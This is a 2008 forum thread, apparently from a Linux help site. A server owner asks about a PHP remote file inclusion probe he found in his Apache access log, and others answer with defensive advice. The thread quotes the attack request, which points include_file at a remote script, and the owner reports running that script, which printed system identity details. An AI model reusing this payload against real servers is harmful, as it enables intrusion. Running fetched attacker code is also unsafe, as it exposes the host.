I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - 80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displyed:
Osirys
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 2.6.22.19-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
os: Linux
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb

Does this information present a security risk? If so what may be done to prevent attacks using this information.

I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further attempts coming from domainfactory GmbH.

TIA for your advice,

Philip

It's a PHP remote upload exploit. I can't seem to find much else about it, but I didn't look very long.

Hey spycxamaican,

I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?

Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.

Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)

These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.

Thanks and HTH,

Lyle

http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as third party.

I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).

Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.

Hi everyone,

Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific ip addresses or ip ranges. The one that allows me to do that blocks my VOIP phone line.

Now that I am learning to create web sites with PHP and MySQL file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.

Again, thank you for your feedback.

Philip

Post a pointer to what you found?

BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.

Howdy again, I just got another update email for this post and I re-read from the beginning...

Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)

Natually, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.

But the response codes are all 404s so there's no risk to me.

Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...

Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.

Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.

This site is very helpful -Virginia Tech (http://www.hosting.vt.edu/tutorials/phpmysql/). However, the more advanced features in this tutorial will only work when all required apache, php and mysql modules are installed.

Thank for the heads up regarding security. This is why I am taking things slowly, building the web aps with security in mind while researching the security issues involved hosting on a public facing serve.

Philip